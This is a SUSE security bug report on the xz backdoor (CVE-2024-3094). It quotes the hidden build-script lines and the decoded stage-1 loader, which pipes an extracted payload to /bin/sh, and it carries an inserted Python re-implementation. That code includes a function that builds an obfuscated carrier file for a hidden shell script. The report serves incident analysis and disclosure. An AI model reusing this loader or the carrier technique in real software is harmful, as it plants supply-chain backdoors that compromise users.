Bug 1222124 (CVE-2024-3094)

Summary: VUL-0: CVE-2024-3094: xz: backdoored 5.6.0, 5.6.1 versions
Product: [Novell Products] SUSE Security Incidents
Reporter: Marcus Meissner <meissner>
Component: Incidents
Assignee: Security Team bot <security-team>
Status: NEW ---
QA Contact: Security Team bot <security-team>
Severity: Normal
Priority: P3 - Medium
CC: adrian.glaubitz, Andreas.Stieger, cathy.hu, danilo.spinella, dimstar, dmueller, eyadlorenzo, fkrueger, hector.oron, jie.gong, meissner, roger.whittaker
Version: unspecified
Target Milestone: ---
Hardware: Other
OS: Other
URL: https://smash.suse.de/issue/399441/
Whiteboard:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---
Bug Depends on: 1222448
Bug Blocks:

Description Marcus Meissner 2024-03-28 11:46:09 UTC
The 5.6.1 version of xz is backdoored.

m4/build-to-host.m4
calls 

  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`

and this:

    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
Comment 1 Marcus Meissner 2024-03-28 12:17:23 UTC
grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/
finds
tests/files/bad-3-corrupt_lzma2.xz
cat tests/files/bad-3-corrupt_lzma2.xz|tr "\t \-_" " \t_\-" >xx
xz -c -d <xx >yy


yy is:
####Hello####
#345U211267$^D330^W
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####
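The two extraction steps shown in comment 1 (the gl_path_map `tr` swap followed by `xz -d`) and in the quoted stage-1 script (the chained `head -c` carving, `tail -c +31233`, the byte-permuting `tr`, and the raw LZMA1 decode) re-implemented in Python. This is an added example, not code from the xz project or from this bug report. Assumptions: grep's `[[:alnum:]]` is written as `[A-Za-z0-9]`; the `build_demo_*` helpers and every sample byte string are constructed stand-ins, not the real `tests/files/*.xz`, so the marker line is demonstrated on a plain constructed file rather than inside a compressed stream.

```python
"""Re-implementation of the extraction steps from comment 1 and the quoted stage-1 script.
Added example, not xz project code; all sample inputs below are constructed, not the real files."""
import lzma
import random
import re

# build-to-host.m4: grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/
# [[:alnum:]] is written as [A-Za-z0-9]; -a means the pattern runs over raw bytes.
MARKER_RE = re.compile(rb"#{4}[A-Za-z0-9]{5}#{4}$", re.MULTILINE)

def find_marker_files(files):
    """grep -l equivalent over {name: bytes}: names of files containing a marker line."""
    return sorted(name for name, blob in files.items() if MARKER_RE.search(blob))

def tr_set(spec):
    """Expand one GNU tr SET (\\NNN octal, \\t, escaped '-', a-b ranges) to bytes."""
    toks, i = [], 0  # (byte value, came from an escape)
    while i < len(spec):
        if spec[i] == "\\":
            m = re.match(r"[0-7]{1,3}", spec[i + 1:])
            if m:
                toks.append((int(m.group(), 8), True))
                i += 1 + m.end()
            else:
                toks.append(({"t": 9, "n": 10, "r": 13, "\\": 92}.get(spec[i + 1], ord(spec[i + 1])), True))
                i += 2
        else:
            toks.append((ord(spec[i]), False))
            i += 1
    out, i = [], 0
    while i < len(toks):
        if i + 2 < len(toks) and toks[i + 1] == (ord("-"), False):  # unescaped '-' is a range
            out.extend(range(toks[i][0], toks[i + 2][0] + 1))
            i += 3
        else:
            out.append(toks[i][0])
            i += 1
    return bytes(out)

def tr_table(set1, set2):
    """Translation table for `tr SET1 SET2`; both sets must expand to the same length."""
    a, b = tr_set(set1), tr_set(set2)
    if len(a) != len(b):
        raise ValueError("tr sets differ in length: %d vs %d" % (len(a), len(b)))
    return bytes.maketrans(a, b)

# gl_path_map in build-to-host.m4 (comment 1): swap tab<->space and '-'<->'_'.
STAGE1_TABLE = tr_table(r"\t \-_", r" \t_\-")
# Stage-1 script: byte permutation applied just before `xz -F raw --lzma1 -dc`.
STAGE2_TABLE = tr_table(r"\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113", r"\0-\377")
# Stage-1 script: 16 x ((head -c +1024 >/dev/null) && head -c +2048), then skip 1024, keep 939.
STAGE1_PATTERN = [(1024, 2048)] * 16 + [(1024, 939)]
TAIL_SKIP = 31232  # tail -c +31233 drops the first 31232 bytes of the carved stream

def recover_stage1(mangled_xz):
    """cat bad-3-corrupt_lzma2.xz | tr "\\t \\-_" " \\t_\\-" | xz -d"""
    return lzma.decompress(mangled_xz.translate(STAGE1_TABLE))

def carve(data, pattern):
    """Chained `(head -c +SKIP >/dev/null) && head -c +TAKE` over one input stream."""
    out, pos = bytearray(), 0
    for skip, take in pattern:
        pos += skip
        out += data[pos:pos + take]
        pos += take
    return bytes(out)

def recover_stage2(carrier_lzma):
    """xz -dc good-large_compressed.lzma | eval $i | tail -c +31233 | tr ... | xz -F raw --lzma1 -dc"""
    hidden = carve(lzma.decompress(carrier_lzma), STAGE1_PATTERN)[TAIL_SKIP:]
    dec = lzma.LZMADecompressor(format=lzma.FORMAT_RAW, filters=[{"id": lzma.FILTER_LZMA1}])
    return dec.decompress(hidden.translate(STAGE2_TABLE))  # stops at the LZMA1 end marker

def build_demo_stage1(script):
    """CONSTRUCTED stand-in for bad-3-corrupt_lzma2.xz: an .xz stream mangled by the swap."""
    return lzma.compress(script).translate(STAGE1_TABLE)  # the swap is its own inverse

def build_demo_carrier(stage2_script, seed=7):
    """CONSTRUCTED stand-in for good-large_compressed.lzma, laid out as the stage-1 script expects:
    inverse-mangled raw-LZMA1 payload after TAIL_SKIP bytes inside the 'take' windows, random 'skip' filler."""
    rng = random.Random(seed)
    filler = lambda n: bytes(rng.getrandbits(8) for _ in range(n))
    raw = lzma.compress(stage2_script, format=lzma.FORMAT_RAW, filters=[{"id": lzma.FILTER_LZMA1}])
    room = sum(take for _, take in STAGE1_PATTERN) - TAIL_SKIP  # 2475 bytes
    if len(raw) > room:
        raise ValueError("payload does not fit the carve pattern")
    inverse = bytes.maketrans(STAGE2_TABLE, bytes(range(256)))  # valid because the table is a permutation
    windows = filler(TAIL_SKIP) + (raw + filler(room - len(raw))).translate(inverse)
    plain, pos = bytearray(), 0
    for skip, take in STAGE1_PATTERN:
        plain += filler(skip) + windows[pos:pos + take]
        pos += take
    return lzma.compress(bytes(plain), format=lzma.FORMAT_ALONE)  # .lzma container

if __name__ == "__main__":
    stage1 = b"####Hello####\n[ ! $(uname) = \"Linux\" ] && exit 0\n####World####\n"
    print(find_marker_files({"tests/files/sample.bin": stage1, "README": b"plain text\n"}))
    print(recover_stage1(build_demo_stage1(stage1)) == stage1)
    stage2 = b"#!/bin/sh\necho stage-2 payload would run here\n"
    print(recover_stage2(build_demo_carrier(stage2)) == stage2)
    print("stage-2 tr table is a permutation:", sorted(STAGE2_TABLE) == list(range(256)))
```

The point worth checking by hand is that the six octal ranges in the stage-2 `tr` set cover 0..255 exactly once, so the mangling is a lossless byte permutation and the decoder can always undo it; `tr_set` makes that verifiable instead of taking it on trust. `recover_stage2` uses `LZMADecompressor` rather than `lzma.decompress` so that whatever filler follows the LZMA1 end-of-payload marker is ignored, mirroring how the shell pipeline stops decoding at the marker.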
Comment 2 Marcus Meissner 2024-03-28 12:44:20 UTC
I informed the distros list.

I reverted Base:System xz to 5.4.3 and submitted to Factory.
Comment 5 Marcus Meissner 2024-03-28 19:02:53 UTC
CRD: 2024-05-13

In VINCE.

I doubt it will hold.
Comment 7 Dirk Mueller 2024-03-28 22:08:18 UTC
I can confirm that the described timing behavior difference is observable with the described method on openSUSE Tumbleweed from yesterday. I can confirm it's gone with today's snapshot.
Comment 8 Marcus Meissner 2024-04-02 11:14:03 UTC
Status update:

We reverted xz in Base:System and openSUSE:Factory on March 28th.

Factory got a fixed ftp tree done by the buildops and factory devs.

A full factory bootstrap was triggered from a base built without a compromised xz.

A news.opensuse.org post was published: https://news.opensuse.org/2024/03/29/xz-backdoor/